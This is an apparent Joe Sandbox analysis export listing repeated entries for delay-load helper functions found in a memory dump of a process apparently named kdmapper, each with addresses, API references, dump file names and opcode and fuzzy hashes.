Function 00DFE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c74cbe517146ce8d925e6766d3591dc21e5ee0c21abc546b76de7933c6051d2
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: 0c74cbe517146ce8d925e6766d3591dc21e5ee0c21abc546b76de7933c6051d2
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ade52adaa51fc0edd1578b1db0afa0f512f87877e7c08040804065f972ec7171
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: ade52adaa51fc0edd1578b1db0afa0f512f87877e7c08040804065f972ec7171
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: edc78e7d06eda22c77d751f26657d01a37e8ad31359916660be755a24b0e76da
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: edc78e7d06eda22c77d751f26657d01a37e8ad31359916660be755a24b0e76da
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd71818b15760dad5001723d5022928f741f34b37f28259d4bc710da236e3ccf
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: fd71818b15760dad5001723d5022928f741f34b37f28259d4bc710da236e3ccf
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2f7f9f4f93e7e9438021a41310172ff6b5a671d8b40f66e4ca4a0388e5a3a39
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: d2f7f9f4f93e7e9438021a41310172ff6b5a671d8b40f66e4ca4a0388e5a3a39
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cb8014c9e5de0e62511160be1f32208cbcaedba29c32292019bc1622df25d438
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: cb8014c9e5de0e62511160be1f32208cbcaedba29c32292019bc1622df25d438
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff9b29caba0f65c56e2ac2736e0e2c8045dfae1dc500b000aab4e4dc174ff628
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: ff9b29caba0f65c56e2ac2736e0e2c8045dfae1dc500b000aab4e4dc174ff628
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d094930994d229b0132ef7e3ba3a95f281314208807cd872ada17b7ebea6ab2
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: 2d094930994d229b0132ef7e3ba3a95f281314208807cd872ada17b7ebea6ab2
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc5e58359dcfe7b0ff648b52d0e7d7b837b295c32aef1b3fcbf1b90cbfe25671
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: cc5e58359dcfe7b0ff648b52d0e7d7b837b295c32aef1b3fcbf1b90cbfe25671
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fb97a27d7cd858c77cefbbdf58a0c21bac0e86bb65d76ace14245fdec0c4a7d
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: 4fb97a27d7cd858c77cefbbdf58a0c21bac0e86bb65d76ace14245fdec0c4a7d
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

Function 00DFE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d406c08d096ef3bd5a89c616266af4b112e0730d12d0b3094aa333823f48ff6
Instruction ID: 1deeb36913850a0f68b1299231ddc66f1e3d5cbe7f0ac26fe658cd0dcd235226
Opcode Fuzzy Hash: 4d406c08d096ef3bd5a89c616266af4b112e0730d12d0b3094aa333823f48ff6
Instruction Fuzzy Hash: 7EA011F22A838ABC300822002C0AC3B030CC0C0F22332E02EFA22E00A0AC80088008B2

Function 00DFE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b973e9a46ae5026906914842963fa6a703b328296f6edb42ebd1bbd7c78f9ab6
Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
Opcode Fuzzy Hash: b973e9a46ae5026906914842963fa6a703b328296f6edb42ebd1bbd7c78f9ab6
Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2

Function 00DFE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cdfeebd2febac80807c3fc6ae500fd1c8fc26b5ef330faf77d407d2eea07cee2
Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
Opcode Fuzzy Hash: cdfeebd2febac80807c3fc6ae500fd1c8fc26b5ef330faf77d407d2eea07cee2
Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2

Function 00DFE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9848e8909934185d8e53cd711554dbf5f09efc45dedbd75daf23c3e81b08d605
Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
Opcode Fuzzy Hash: 9848e8909934185d8e53cd711554dbf5f09efc45dedbd75daf23c3e81b08d605
Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2

Function 00DFE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ebfade84fab45969fb6b502b0c6a61b91fc23bdb4b2281d23818771c1dea5fc8
Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
Opcode Fuzzy Hash: ebfade84fab45969fb6b502b0c6a61b91fc23bdb4b2281d23818771c1dea5fc8
Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2

Function 00DFE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 64dabde91c501fa2b19008715f1187699cecf0f7b65964dc0c9db691315ad266
Instruction ID: 2fdabb21c70cfb4b1f52fc86b82c6a42aabd0499ccb83c372eb3899f4873bdd0
Opcode Fuzzy Hash: 64dabde91c501fa2b19008715f1187699cecf0f7b65964dc0c9db691315ad266
Instruction Fuzzy Hash: F9A001F62A939ABC310862516D0AC7B435DC4C5FA2332E92EFA56E54A5A880589518B2

Function 00DFE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
